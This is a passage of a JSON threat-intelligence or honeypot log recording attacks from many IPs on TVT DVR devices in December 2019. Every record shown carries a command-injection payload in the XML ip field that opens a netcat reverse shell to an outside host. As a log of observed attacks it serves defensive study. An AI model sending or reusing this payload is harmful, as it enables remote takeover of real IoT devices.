- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 61,
- "first_seen": "2019-12-21T14:00:21Z",
- "last_seen": "2019-12-21T14:00:21Z"
- },
- {
- "source_ip_address": "91.80.140.60",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-21T13:53:03Z",
- "last_seen": "2019-12-21T13:53:03Z"
- },
- {
- "source_ip_address": "37.116.198.205",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-21T13:52:39Z",
- "last_seen": "2019-12-21T13:52:39Z"
- },
- {
- "source_ip_address": "93.42.255.250",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T13:52:30Z",
- "last_seen": "2019-12-21T13:52:30Z"
- },
- {
- "source_ip_address": "109.102.31.87",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-19T20:46:59Z",
- "last_seen": "2019-12-21T13:42:48Z"
- },
- {
- "source_ip_address": "24.11.21.163",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-21T13:38:29Z",
- "last_seen": "2019-12-21T13:38:29Z"
- },
- {
- "source_ip_address": "79.121.78.127",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-21T13:37:13Z",
- "last_seen": "2019-12-21T13:37:13Z"
- },
- {
- "source_ip_address": "49.171.149.140",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 64,
- "first_seen": "2019-12-21T13:33:07Z",
- "last_seen": "2019-12-21T13:33:07Z"
- },
- {
- "source_ip_address": "89.165.204.71",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T13:16:49Z",
- "last_seen": "2019-12-21T13:16:49Z"
- },
- {
- "source_ip_address": "61.70.132.168",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T13:05:57Z",
- "last_seen": "2019-12-21T13:05:57Z"
- },
- {
- "source_ip_address": "220.85.29.32",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T12:46:32Z",
- "last_seen": "2019-12-21T12:46:32Z"
- },
- {
- "source_ip_address": "111.185.231.71",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-21T12:32:31Z",
- "last_seen": "2019-12-21T12:32:31Z"
- },
- {
- "source_ip_address": "178.61.159.182",
- "country": "KW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 70,
- "first_seen": "2019-12-21T12:31:50Z",
- "last_seen": "2019-12-21T12:31:50Z"
- },
- {
- "source_ip_address": "84.33.110.125",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-21T12:11:45Z",
- "last_seen": "2019-12-21T12:11:45Z"
- },
- {
- "source_ip_address": "136.43.32.84",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 72,
- "first_seen": "2019-12-21T12:11:21Z",
- "last_seen": "2019-12-21T12:11:21Z"
- },
- {
- "source_ip_address": "73.124.228.86",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T12:09:40Z",
- "last_seen": "2019-12-21T12:09:40Z"
- },
- {
- "source_ip_address": "175.101.76.9",
- "country": "IN",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T10:56:33Z",
- "last_seen": "2019-12-21T10:56:33Z"
- },
- {
- "source_ip_address": "61.223.122.138",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T10:53:27Z",
- "last_seen": "2019-12-21T10:53:27Z"
- },
- {
- "source_ip_address": "93.42.110.44",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-21T10:41:39Z",
- "last_seen": "2019-12-21T10:41:39Z"
- },
- {
- "source_ip_address": "187.131.123.210",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T10:34:33Z",
- "last_seen": "2019-12-21T10:34:33Z"
- },
- {
- "source_ip_address": "220.135.161.28",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T10:27:50Z",
- "last_seen": "2019-12-21T10:27:50Z"
- },
- {
- "source_ip_address": "178.129.223.44",
- "country": "RU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 11,
- "first_seen": "2019-12-21T10:26:39Z",
- "last_seen": "2019-12-21T10:26:39Z"
- },
- {
- "source_ip_address": "202.186.145.45",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-21T10:09:11Z",
- "last_seen": "2019-12-21T10:09:11Z"
- },
- {
- "source_ip_address": "220.134.157.241",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 356,
- "first_seen": "2019-12-19T10:56:36Z",
- "last_seen": "2019-12-21T10:08:48Z"
- },
- {
- "source_ip_address": "220.134.196.223",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T10:02:38Z",
- "last_seen": "2019-12-21T10:02:38Z"
- },
- {
- "source_ip_address": "188.24.16.4",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T09:53:34Z",
- "last_seen": "2019-12-21T09:53:34Z"
- },
- {
- "source_ip_address": "95.123.27.193",
- "country": "ES",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 11,
- "first_seen": "2019-12-21T09:29:24Z",
- "last_seen": "2019-12-21T09:29:24Z"
- },
- {
- "source_ip_address": "189.190.95.157",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
